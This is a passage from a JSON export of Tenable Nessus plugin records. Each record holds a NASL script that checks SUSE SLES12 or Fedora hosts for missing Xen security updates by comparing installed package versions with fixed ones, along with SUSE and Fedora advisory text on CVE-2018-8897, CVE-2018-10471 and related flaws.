"SUSE_SU-2018-3230-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3230-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118304);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5754/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183230-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c34e0db\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-841=1\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:45:11", "description": "This update for xen fixes several issues. 
These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-14T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1216-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1216-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109756);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes 
several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181216-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?561d072a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-841=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-841=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t 
patch\nSUSE-SLE-SERVER-12-SP2-2018-841=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2018-841=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:18:32", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 6.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-05-02T00:00:00", "title": "Fedora 27 : xen (2018-604574c943)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2018-05-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2018-604574C943.NASL", "href": "https://www.tenable.com/plugins/nessus/109519", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-604574c943.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109519);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-604574c943\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"Fedora 27 : xen (2018-604574c943)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-604574c943\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"xen-4.9.2-2.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:21:54", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 5.6, "vector": "AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : xen (2018-dbebca30d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-DBEBCA30D0.NASL", "href": "https://www.tenable.com/plugins/nessus/120843", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2018-dbebca30d0.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120843);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-dbebca30d0\");\n\n script_name(english:\"Fedora 28 : xen (2018-dbebca30d0)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora 